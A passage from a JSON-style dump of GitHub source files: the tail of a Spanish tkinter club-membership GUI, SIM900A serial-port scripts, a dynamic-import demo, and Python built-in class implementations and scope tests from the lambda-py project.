btnOK.pack(side='right',padx=(0,10), pady=(0,3))\r\n\r\n tableFrame = ttk.Frame(self.topFramePto3)\r\n tableFrame.pack(side='top',fill='both',expand='True')\r\n \r\n dataColumns = [\"#\",\"Nombre\",\"Edad\",\"Equipo\"]\r\n tableResponse = ttk.Treeview(tableFrame,columns=dataColumns,show='headings')\r\n \r\n for c in dataColumns:\r\n tableResponse.heading(c,text=c,anchor='w')\r\n tableResponse.column(c,width=len(c),stretch=True,anchor='w')\r\n for i in range(len(self.dataSociosPunto3)):\r\n nombre,edad,equipo = self.dataSociosPunto3[i]\r\n tableResponse.insert('','end',values=(i+1,nombre,edad,equipo))\r\n \r\n scroll = ttk.Scrollbar(tableFrame,orient='vertical',command=tableResponse.yview)\r\n tableResponse.config(yscrollcommand=scroll.set)\r\n tableResponse.pack(side='left',fill='both',expand=True,padx=(15,0),pady=5)\r\n scroll.pack(side='left',fill='y',padx=(0,10),pady=5)\r\n\r\n def destroyTopPto3(self):\r\n self.topFramePto3.destroy()\r\n del self.topFramePto3\r\n #Ejecucion Pto4\r\n def executePunto4(self):\r\n response = self.callbacks[\"punto4\"]()\r\n self.dataSociosPunto4 = response\r\n if response == []:\r\n self.punto4EmptyResponse()\r\n else:\r\n self.punto4LoadResponse()\r\n \r\n def punto4EmptyResponse(self):\r\n if hasattr(self,\"btnResponsePunto4\"):\r\n self.btnResponsePunto4.pack_forget()\r\n self.btnResponsePunto4.destroy()\r\n del self.btnResponsePunto4\r\n if not hasattr(self,\"lblResponsePunto4\"):\r\n self.lblResponsePunto4 = tk.Label(self.punto4FrameBase)\r\n self.lblResponsePunto4.config(\r\n text=\"No hay socios registrados hinchas de River.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto4.pack(side='left',padx=(4,3),fill='x')\r\n else:\r\n self.lblResponsePunto4.config(text=\"No hay socios registrados hinchas de River.\")\r\n self.lblResponsePunto4.update()\r\n\r\n def punto4LoadResponse(self):\r\n if hasattr(self,\"lblResponsePunto4\"):\r\n self.lblResponsePunto4.pack_forget()\r\n self.lblResponsePunto4.destroy()\r\n del self.lblResponsePunto4\r\n if not hasattr(self,\"btnResponsePunto4\"):\r\n self.btnResponsePunto4 = tk.Button(self.punto4FrameBase)\r\n self.btnResponsePunto4.config(\r\n text=\"Ver respuesta\", command=self.showResponsePunto4\r\n )\r\n self.btnResponsePunto4.pack(side='left',padx=(4,3))\r\n \r\n def showResponsePunto4(self):\r\n if hasattr(self,\"topFramePto4\"):\r\n self.topFramePto4.focus()\r\n else:\r\n xInit = int(self.root.winfo_rootx()) + int(self.root.winfo_width()*0.25)\r\n yInit = int(self.root.winfo_rooty()) + int(self.root.winfo_height()*0.25)\r\n\r\n self.topFramePto4 = tk.Toplevel(self.root)\r\n self.topFramePto4.title(\"Ranking Top-5 Nombres de socios de River.\")\r\n self.topFramePto4.geometry(\"400x220+%i+%i\"%(xInit,yInit))\r\n btnFrame = ttk.Frame(self.topFramePto4)\r\n btnFrame.pack(side='bottom',fill='x')\r\n btnOK = ttk.Button(btnFrame)\r\n btnOK.config(text=\"Aceptar\",command=self.destroyTopPto4)\r\n btnOK.pack(side='right',padx=(0,10), pady=(0,3))\r\n\r\n tableFrame = ttk.Frame(self.topFramePto4)\r\n tableFrame.pack(side='top',fill='both',expand='True')\r\n \r\n dataColumns = [\"#\",\"Nombre\",\"Socios\"]\r\n tableResponse = ttk.Treeview(tableFrame,columns=dataColumns,show='headings')\r\n \r\n for c in dataColumns:\r\n tableResponse.heading(c,text=c,anchor='w')\r\n tableResponse.column(c,width=len(c),stretch=True,anchor='w')\r\n for i in range(len(self.dataSociosPunto4)):\r\n nombre,cantSocios = self.dataSociosPunto4[i]\r\n tableResponse.insert('','end',values=(i+1,nombre,cantSocios))\r\n \r\n scroll = ttk.Scrollbar(tableFrame,orient='vertical',command=tableResponse.yview)\r\n tableResponse.config(yscrollcommand=scroll.set)\r\n tableResponse.pack(side='left',fill='both',expand=True,padx=(15,0),pady=5)\r\n scroll.pack(side='left',fill='y',padx=(0,10),pady=5)\r\n \r\n def destroyTopPto4(self):\r\n self.topFramePto4.destroy()\r\n del self.topFramePto4\r\n #Ejecucion Pto5\r\n def executePunto5(self):\r\n response = self.callbacks[\"punto5\"]()\r\n self.dataSociosPunto5 = response\r\n if response == []:\r\n self.punto5EmptyResponse()\r\n else:\r\n self.punto5LoadResponse()\r\n \r\n def punto5EmptyResponse(self):\r\n if hasattr(self,\"btnResponsePunto5\"):\r\n self.btnResponsePunto5.pack_forget()\r\n self.btnResponsePunto5.destroy()\r\n del self.btnResponsePunto5\r\n if not hasattr(self,\"lblResponsePunto5\"):\r\n self.lblResponsePunto5 = tk.Label(self.punto5FrameBase)\r\n self.lblResponsePunto5.config(\r\n text=\"No hay socios de equipos registrados necesarios para formar una respuesta.\",\r\n anchor='e',background=self.bgLightYellow\r\n )\r\n self.lblResponsePunto5.pack(side='left',padx=(4,3),fill='x')\r\n else:\r\n self.lblResponsePunto5.config(text=\"No hay socios de equipos registrados necesarios para formar una respuesta.\")\r\n self.lblResponsePunto5.update()\r\n\r\n def punto5LoadResponse(self):\r\n if hasattr(self,\"lblResponsePunto5\"):\r\n self.lblResponsePunto5.pack_forget()\r\n self.lblResponsePunto5.destroy()\r\n\r\n if not hasattr(self,\"btnResponsePunto5\"):\r\n self.btnResponsePunto5 = tk.Button(self.punto5FrameBase)\r\n self.btnResponsePunto5.config(\r\n text=\"Ver respuesta\", command=self.showResponsePunto5\r\n )\r\n self.btnResponsePunto5.pack(side='left',padx=(4,3))\r\n \r\n def showResponsePunto5(self):\r\n if hasattr(self,\"topFramePto5\"):\r\n self.topFramePto5.focus()\r\n else:\r\n xInit = int(self.root.winfo_rootx()) + int(self.root.winfo_width()*0.25)\r\n yInit = int(self.root.winfo_rooty()) + int(self.root.winfo_height()*0.25)\r\n\r\n self.topFramePto5 = tk.Toplevel(self.root)\r\n self.topFramePto5.title(\"Ranking de equipos según su cantidad de socios.\")\r\n self.topFramePto5.geometry(\"485x270+%i+%i\"%(xInit,yInit))\r\n btnFrame = ttk.Frame(self.topFramePto5)\r\n btnFrame.pack(side='bottom',fill='x')\r\n btnOK = ttk.Button(btnFrame)\r\n btnOK.config(text=\"Aceptar\",command=self.destroyTopPto5)\r\n btnOK.pack(side='right',padx=(0,10), pady=(0,3))\r\n\r\n tableFrame = ttk.Frame(self.topFramePto5)\r\n tableFrame.pack(side='top',fill='both',expand='True')\r\n \r\n dataColumns = [\"#\",\"Equipo\",\"Socios\",\"Max. Edad\",\"Min. Edad\"]\r\n tableResponse = ttk.Treeview(tableFrame,columns=dataColumns,show='headings')\r\n \r\n for c in dataColumns:\r\n tableResponse.heading(c,text=c,anchor='w')\r\n tableResponse.column(c,width=len(c),stretch=True,anchor='w')\r\n for i in range(len(self.dataSociosPunto5)):\r\n equipo,cantSocios,maxEdad,minEdad = self.dataSociosPunto5[i]\r\n tableResponse.insert('','end',values=(i+1,equipo,cantSocios,maxEdad,minEdad))\r\n \r\n scroll = ttk.Scrollbar(tableFrame,orient='vertical',command=tableResponse.yview)\r\n tableResponse.config(yscrollcommand=scroll.set)\r\n tableResponse.pack(side='left',fill='both',expand=True,padx=(15,0),pady=5)\r\n scroll.pack(side='left',fill='y',padx=(0,10),pady=5)\r\n \r\n def destroyTopPto5(self):\r\n self.topFramePto5.destroy()\r\n del self.topFramePto5\r\n\r\n "
}
] | 4 |
SurajPawar15-smart/Findstate
|
https://github.com/SurajPawar15-smart/Findstate
|
b1db16f289daa8fde5dd15348c319737413c7752
|
db513131ea4cf03dcbcc106837b7a44d37411431
|
f10552b28dbded2d00e06fa306a387a29c762379
|
refs/heads/master
| 2022-12-04T02:25:43.845646 | 2020-08-15T13:28:54 | 2020-08-15T13:28:54 | 287,751,925 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7194066643714905,
"alphanum_fraction": 0.7194066643714905,
"avg_line_length": 32.04166793823242,
"blob_id": "b4b41386fc52bfc5d721c83eca9c4cb2c37220a8",
"content_id": "7e6db89c666ff965dc116bb1e994b15dde896413",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 809,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 24,
"path": "/crud/views.py",
"repo_name": "SurajPawar15-smart/Findstate",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse\ndef agent(request):\n return render(request, 'agent.html')\ndef index(request):\n return render(request, 'index.html')\ndef about(request):\n return render(request, 'about.html')\ndef blog(request):\n return render(request, 'blog.html')\ndef contact(request):\n return render(request, 'contact.html')\ndef blog_single(request):\n return render(request, 'blog_single.html')\ndef main(request):\n return render(request, 'main.html')\ndef properties(request):\n return render(request, 'properties.html')\ndef properties_single(request):\n return render(request, 'properties_single.html')\ndef services(request):\n return render(request, 'services.html')\ndef home(request):\n return render(request, 'home.html')\n "
}
] | 1 |
lijunsong/lambda-py
|
https://github.com/lijunsong/lambda-py
|
a5becb8a498eb88455fa8cb38492937d3aedb031
|
d2ff89be26c673b875e400fd27dba9f010e047c5
|
7fde94739c28bd8e3aa2ce9845e0d312e3929588
|
refs/heads/master
| 2020-12-30T17:44:17.932473 | 2013-03-01T22:31:36 | 2013-03-01T22:31:36 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5803418755531311,
"alphanum_fraction": 0.5803418755531311,
"avg_line_length": 22.360000610351562,
"blob_id": "bc636512ecf8ba30eef7e395343476fe9036b420",
"content_id": "d988cb28ee8fe860e529e1e9ebef96ea8ac0cc71",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1170,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 50,
"path": "/base/pylib/dict.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "\nclass dict(object):\n def __init__(self):\n self = ___delta(\"dict-init\", self, dict)\n\n def __len__(self):\n return ___delta(\"dict-len\", self, int)\n\n def __str__(self):\n return ___delta(\"dict-str\", self, str)\n\n def __list__(self):\n return ___delta(\"dict->list\", self, list)\n\n def get(self, key, *default):\n return ___delta(\"dict-get\", self, key, default)\n\n def __iter__(self):\n return self.keys().__iter__()\n\n def __in__(self, other):\n return ___delta(\"dict-in\", self, other)\n\n def __eq__(self, other):\n return dicteq(self, other)\n\n def clear(self):\n return ___delta(\"dict-clear\", self)\n\n def update(self, *other):\n return ___delta(\"dict-update\", self, other)\n\n def keys(self):\n return ___delta(\"dict-keys\", self, set)\n\n def values(self):\n return ___delta(\"dict-values\", self, set)\n\n def items(self):\n return ___delta(\"dict-items\", self, set, tuple)\n\n def __getitem__(self, key):\n return ___delta(\"dict-getitem\", self, key)\n\n def __setitem__(self, key, val):\n return ___delta(\"dict-setitem\", self, key, val)\n\n def __delitem__(self, key):\n return ___delta(\"dict-delitem\", self, key)\n\n___assign(\"%dict\", dict)\n\n"
},
{
"alpha_fraction": 0.5380059480667114,
"alphanum_fraction": 0.5666337609291077,
"avg_line_length": 24.9743595123291,
"blob_id": "5a74b9d3e93e2d5d3b62f0796ac140b47de7a562",
"content_id": "5ff80388d500633ce3916f64c68687eedf7c98c2",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1013,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 39,
"path": "/tests/python-reference/multiple-inheritance/test_multiple_inheritance.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# Testing multiple inheritance...\nclass C(object):\n def __init__(self):\n self.__state = 0\n def getstate(self):\n return self.__state\n def setstate(self, state):\n self.__state = state\na = C()\n___assertEqual(a.getstate(), 0)\na.setstate(10)\n___assertEqual(a.getstate(), 10)\nclass D(dict, C):\n def __init__(self):\n type({}).__init__(self)\n C.__init__(self)\nd = D()\n___assertEqual(list(d.keys()), [])\nd[\"hello\"] = \"world\"\n___assertEqual(list(d.items()), [(\"hello\", \"world\")])\n___assertEqual(d[\"hello\"], \"world\")\n___assertEqual(d.getstate(), 0)\nd.setstate(10)\n___assertEqual(d.getstate(), 10)\n___assertEqual(D.__mro__, (D, dict, C, object))\n\n# SF bug #442833\nclass Node(object):\n def __int__(self):\n return int(self.foo())\n def foo(self):\n return \"23\"\nclass Frag(Node, list):\n def foo(self):\n return \"42\"\n___assertEqual(Node().__int__(), 23)\n___assertEqual(int(Node()), 23)\n___assertEqual(Frag().__int__(), 42)\n___assertEqual(int(Frag()), 42)\n"
},
{
"alpha_fraction": 0.5879999995231628,
"alphanum_fraction": 0.5920000076293945,
"avg_line_length": 92.75,
"blob_id": "6cf25ae257f171b66b1b734513334d3cffd55f1b",
"content_id": "dee3b725b97ffa79be77971b136105e222fec912",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 750,
"license_type": "permissive",
"max_line_length": 333,
"num_lines": 8,
"path": "/base/Makefile",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "all:\n\tfor foo in `git grep -l 'lang plai-typed$$' | grep '\\.rkt$$'`; do sed -i s/'lang plai-typed$$'/'lang plai-typed\\/untyped'/g $$foo; done && git ls-files | grep '\\.rkt$$' | xargs raco make -j 5\n\ntypecheck:\n\tfor foo in `git ls-files | grep '\\.rkt$$'`; do `which cp` -p $$foo $$foo\"_\"; done && git ls-files | grep '\\.rkt$$' | xargs sed -i s/'lang plai-typed\\/untyped'/'lang plai-typed'/g && git ls-files | grep '\\.rkt$$' | xargs raco make -j 5; for foo in `git ls-files | grep '\\.rkt$$'`; do `which cp` -p $$foo\"_\" $$foo && rm $$foo\"_\"; done\n\ntyped:\n\tfor foo in `git grep -l 'lang plai-typed/untyped' | grep '\\.rkt$$'`; do sed -i s/'lang plai-typed\\/untyped'/'lang plai-typed'/g $$foo; done && git ls-files | grep '\\.rkt$$' | xargs raco make -j 5\n"
},
{
"alpha_fraction": 0.5263158082962036,
"alphanum_fraction": 0.5789473652839661,
"avg_line_length": 11.333333015441895,
"blob_id": "c272197d20cd3901622079ae080db646f6d84607",
"content_id": "7c9b0a77faf19ce970ebff91fa86ccf7eba4c9aa",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 38,
"license_type": "permissive",
"max_line_length": 17,
"num_lines": 3,
"path": "/tests/bugs/address-of-none.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "ret = None\nret = 3\nassert(None == 3)\n\n"
},
{
"alpha_fraction": 0.44720497727394104,
"alphanum_fraction": 0.4906832277774811,
"avg_line_length": 16.88888931274414,
"blob_id": "adffaa643db87f90caca07f3783f80ad20c1b866",
"content_id": "6d4cd6d35fcd376994c41132955c960bc62a6827",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 161,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 9,
"path": "/base/pylib/dicteq.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "def dicteq(d1, d2):\n if len(d1) == len(d2):\n for x in d1:\n v = d1[x]\n if d2[x] != v:\n return False\n return True\n else:\n return False\n"
},
{
"alpha_fraction": 0.4849397540092468,
"alphanum_fraction": 0.5120481848716736,
"avg_line_length": 21.133333206176758,
"blob_id": "bbc1f2ca35142969c9ed80b025cd7dc4eb68a53c",
"content_id": "d121dc8f21b379f50611c56be1b9f942b4ec2534",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 332,
"license_type": "permissive",
"max_line_length": 56,
"num_lines": 15,
"path": "/tests/scope/recursion.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# recursive functions must work. They aren't that hard, \n# although we should be sure to test...\n\ndef f(x):\n def fact(n):\n if n == 0:\n return 1\n else:\n return n * fact(n - 1)\n if x >= 0:\n return fact(x)\n else:\n raise ValueError(\"x must be >= 0\")\n\n___assertEqual(f(6), 720)\n"
},
{
"alpha_fraction": 0.5616883039474487,
"alphanum_fraction": 0.5876623392105103,
"avg_line_length": 22.69230842590332,
"blob_id": "20c701162d71796d1b39138304e18189719b3244",
"content_id": "e565b214a1020efcd01e84bf687291a2a7524fbf",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 13,
"path": "/tests/scope/nearest-enclosing-scope.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# should this test fail, I suspect there is something\n# wrong with shadowing/scope type precedence. \n\ndef f(x):\n def g(y):\n x = 42 # check that this masks binding in f()\n def h(z):\n return x + z\n return h\n return g(2)\n\ntest_func = f(10)\n___assertEqual(test_func(5), 47)\n"
},
{
"alpha_fraction": 0.6454545259475708,
"alphanum_fraction": 0.6709091067314148,
"avg_line_length": 26.5,
"blob_id": "159483dac70fb7e495865d8301c0e49c750b1460",
"content_id": "ad256ae78bc14a7bd3071a1d17102214bb42ee5c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 550,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 20,
"path": "/tests/scope/extra-nesting.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# the variable x will be nonlocal in extra given our \n# current implementation of scope. Since there is no\n# local to shadow it, it should be correctly closed over \n# in adder(). \n\n# TODO it might be good to have a case to check for\n# proper use of closed-over nonlocals. \n\ndef make_adder2(x):\n def extra(): # check freevars passing through non-use scopes\n def adder(y):\n return x + y\n return adder\n return extra()\n\ninc = make_adder2(1)\nplus10 = make_adder2(10)\n\n___assertEqual(inc(1), 2)\n___assertEqual(plus10(-2), 8)\n"
},
{
"alpha_fraction": 0.5029761791229248,
"alphanum_fraction": 0.523809552192688,
"avg_line_length": 17.66666603088379,
"blob_id": "ee0e468eff691e22e8d79281639a9639852b4560",
"content_id": "50e5109f6b418a306d1d69ccf8c949b1ba8e1001",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 336,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 18,
"path": "/tests/scope/nonlocal-function.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# make sure we are closing over the same location for x\n\ndef f(x):\n def inc():\n nonlocal x\n x += 1\n return x\n def dec():\n nonlocal x\n x -= 1\n return x\n return inc, dec\n\ninc, dec = f(0)\n___assertEqual(inc(), 1)\n___assertEqual(inc(), 2)\n___assertEqual(dec(), 1)\n___assertEqual(dec(), 0)\n"
},
{
"alpha_fraction": 0.53663569688797,
"alphanum_fraction": 0.5386996865272522,
"avg_line_length": 23.794872283935547,
"blob_id": "71765324995e2d51ca7b190164f390b72246110a",
"content_id": "17860670820685930c353f2fbf15937ba124d53e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 969,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 39,
"path": "/base/pylib/set.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "\nclass set(object):\n def __init__(self, *args):\n if ___delta(\"num=\", args.__len__(), 0):\n self = ___emptyset()\n else:\n self = args.__getitem__(0).__set__()\n\n def __len__(self):\n return ___delta(\"set-len\", self, int)\n\n def __set__(self):\n # NOTE(joe): list copy can do the job here, no need for set-copy prim\n return self.__list__().__set__()\n\n def __list__(self):\n return ___delta(\"set-list\", self, list)\n\n def __iter__(self):\n return SeqIter(self.__list__())\n\n def __in__(self, elt):\n return ___delta(\"set-in\", self, elt)\n\n def __eq__(self, other):\n return ___delta(\"set-eq\", self, other)\n\n def __sub__(self, other):\n return ___delta(\"set-sub\", self, other, set)\n\n def __and__(self, other):\n return ___delta(\"set-and\", self, other, set)\n\n def __or__(self, other):\n return ___delta(\"set-or\", self, other, set)\n\n def __xor__(self, other):\n return ___delta(\"set-xor\", self, other, set)\n\n___assign(\"%set\", set)\n\n"
},
{
"alpha_fraction": 0.5639810562133789,
"alphanum_fraction": 0.6161137223243713,
"avg_line_length": 16.58333396911621,
"blob_id": "cdc8733c82c25a1bb70f6d2c104a21b0a6ccbbd8",
"content_id": "0ab51810c86dcb6711b7c8f4a2cbb68168c8f3dd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 12,
"path": "/tests/scope/simple-nesting.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# closing over correct values...\n\ndef make_adder(x):\n def adder(y):\n return x + y\n return adder\n\ninc = make_adder(1)\nplus10 = make_adder(10)\n\n___assertEqual(inc(1), 2)\n___assertEqual(plus10(-2), 8)\n"
},
{
"alpha_fraction": 0.513864278793335,
"alphanum_fraction": 0.5238938331604004,
"avg_line_length": 23.185714721679688,
"blob_id": "b8070da1c6dd90724631b146487fb29d03343d06",
"content_id": "f11f2138fe7367c9a7e0e312c5a397c00e741d38",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1695,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 70,
"path": "/base/pylib/list.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "\nclass list(object):\n def __init__(self, other):\n if (type(other) == list):\n self = ___delta(\"list-copy\", other, list)\n else:\n self = other.__list__()\n\n def __len__(self):\n return ___delta(\"list-len\", self, int)\n\n def __add__(self, other):\n return ___delta(\"list+\", self, other, list)\n\n def __list__(self):\n return SeqIter(self).__list__()\n\n def __iter__(self):\n return SeqIter(self)\n\n def __tuple__(self):\n return ___delta(\"list-tuple\", self, tuple)\n\n def __set__(self):\n return ___delta(\"list-set\", self, set)\n\n def __in__(self, test):\n return ___delta(\"list-in\", self, test)\n\n def __str__(self):\n return ___delta(\"list-str\", self, str)\n\n def __getitem__(self, idx):\n return ___delta(\"list-getitem\", self, idx)\n\n def __setitem__(self, idx, val):\n return ___delta(\"list-setitem\", self, idx, val, list)\n\n # NOTE(joe): copied code (tuple.py)\n def __cmp__(self, other):\n def lstcmp(self, other, idx):\n li1 = self.__getitem__(idx)\n li2 = other.__getitem__(idx)\n if ___prim2(\"Is\", li1, None):\n if ___prim2(\"Is\", li2, None):\n return 0\n else:\n return 1\n else:\n if ___prim2(\"Is\", li2, None):\n return 1\n else:\n cmpval = li1.__cmp__(li2)\n if cmpval.__eq__(0):\n nidx = idx.__add__(1)\n return lstcmp(self, other, nidx)\n else:\n return cmpval\n return lstcmp(self, other, 0)\n\n def __eq__(self, other):\n cmpresult = self.__cmp__(other)\n return cmpresult.__eq__(0)\n\n def extend(self, other):\n self = self.__add__(other)\n\n def append(self, other):\n self.extend([other])\n\n___assign(\"%list\", list)\n\n"
},
{
"alpha_fraction": 0.6901669502258301,
"alphanum_fraction": 0.6938775777816772,
"avg_line_length": 23.5,
"blob_id": "b773eec3cc070dbd9a2a15ff47a3c36880ece4dc",
"content_id": "d9ce890bb8b33542fdb5bd6092468c78466fd74a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 539,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 22,
"path": "/tests/scope/unbound-local.py",
"repo_name": "lijunsong/lambda-py",
"src_encoding": "UTF-8",
"text": "# use of variable before assignment. There shouldn't be a\n# problem with this case unless we fail to correctly lift\n# all variables and assign them to Unbound if they are \n# not defined. \n\n# TODO: formalize what is going wrong if we get NameError\n# instead of UnboundLocalError, or elsewise. \n\ndef errorInOuter():\n print(y)\n def inner():\n return y\n y = 1\n\ndef errorInInner():\n def inner():\n return y\n inner()\n y = 1\n\n___assertRaises(UnboundLocalError, errorInOuter)\n___assertRaises(NameError, errorInInner)\n"
}
] | 13 |
jinwanlin/sim900a
|
https://github.com/jinwanlin/sim900a
|
119258121d668e2c5b218a3b6ebf5243191db2d4
|
7bd059bccf0c0f49db5d47bb59eb4b0194b22d75
|
327524df1f52d3343780550282912f19f177b259
|
refs/heads/master
| 2021-01-10T20:39:26.114572 | 2015-08-25T02:23:28 | 2015-08-25T02:23:28 | 41,335,355 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6041666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 22.5,
"blob_id": "008078aa557fafea2b55eb3ace5ca3a8714cfc54",
"content_id": "ed99afd3707235bbdbc8c006af59b2f98a5e8e52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 4,
"path": "/write.py",
"repo_name": "jinwanlin/sim900a",
"src_encoding": "UTF-8",
"text": "import serial \nser = serial.Serial(\"/dev/ttyAMA0\", 9600)\nser.write(\"AT\")\n#print(ser.read(2))\n\n\n"
},
{
"alpha_fraction": 0.5185185074806213,
"alphanum_fraction": 0.5277777910232544,
"avg_line_length": 15.5,
"blob_id": "f67fe39c21a0ca93f04aa0d53e35e227a58473fe",
"content_id": "03eb5dfc0855bdec6152d495705e3b91cf6bed3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 108,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 6,
"path": "/classname.py",
"repo_name": "jinwanlin/sim900a",
"src_encoding": "UTF-8",
"text": "class classname:\n def mod1(self):\n pass\n\n def echo(self,params):\n print params\n \n"
},
{
"alpha_fraction": 0.5411392450332642,
"alphanum_fraction": 0.5411392450332642,
"avg_line_length": 24.91666603088379,
"blob_id": "cc3269cd51ff46f3a70133045f7be534505f9ff1",
"content_id": "1d094462540a671678f77d3af5df60a2f83ae879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 316,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 12,
"path": "/classname_test.py",
"repo_name": "jinwanlin/sim900a",
"src_encoding": "UTF-8",
"text": "def test():\n clsname = \"classname\"\n# method = \n params=\"jinwanlin\"\n obj = __import__(clsname) # import module\n c = getattr(obj,clsname)\n obj = c() # new class\n mtd = getattr(obj,\"echo\")\n mtd(params) # call def\n \nif __name__ == '__main__':\n test(\"classname.echo('jinwanlin')\") \n "
},
{
"alpha_fraction": 0.5983935594558716,
"alphanum_fraction": 0.6224899888038635,
"avg_line_length": 16.785715103149414,
"blob_id": "a43930fb00d7a0538d452a75fd2d1d61f93e2c09",
"content_id": "728aa10389db314af88e4e73c112c2ce7d1e94e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 498,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 28,
"path": "/read.py",
"repo_name": "jinwanlin/sim900a",
"src_encoding": "UTF-8",
"text": "import time\nimport serial\nser = serial.Serial(\n port='/dev/ttyAMA0',\n baudrate=9600,\n parity=serial.PARITY_ODD,\n stopbits=serial.STOPBITS_TWO,\n bytesize=serial.SEVENBITS\n)\ndata = ''\nwhile(True):\n while ser.inWaiting() > 0:\n data += ser.read(1)\n if data != '':\n hexShow(data)\n# print('------------') \n \n\n#\n# import serial\n# t = serial.Serial(\"/dev/ttyAMA0\", 9600)\n# t.portstr\n# strInput = raw_input('AT')\n# n = t.write(strInput)\n# print n\n# str = t.read(n)\n# print str\n# hexShow(str)\n"
}
] | 4 |
SuperboGiuseppe/dncs_lab2
|
https://github.com/SuperboGiuseppe/dncs_lab2
|
c03aedd2668b11327f9cc9c2dc501e5e34aa57f7
|
c340169f3133c4fa1574f5be82268e2958e57975
|
5198bbf8df9455ae1cfbe12bb1e4d524f4be0429
|
refs/heads/main
| 2023-03-16T02:36:07.694591 | 2021-03-15T14:21:43 | 2021-03-15T14:21:43 | 309,404,448 | 3 | 3 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5215771794319153,
"alphanum_fraction": 0.5308910012245178,
"avg_line_length": 45.02857208251953,
"blob_id": "083d809493283eba9860a5aad672a52137b06584",
"content_id": "cc822c5baf9cc86dd4a278c6689cf384e87e79e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3221,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 70,
"path": "/fromHTMLtoVagrant/support_scripts/vagrantfilecreator.py",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
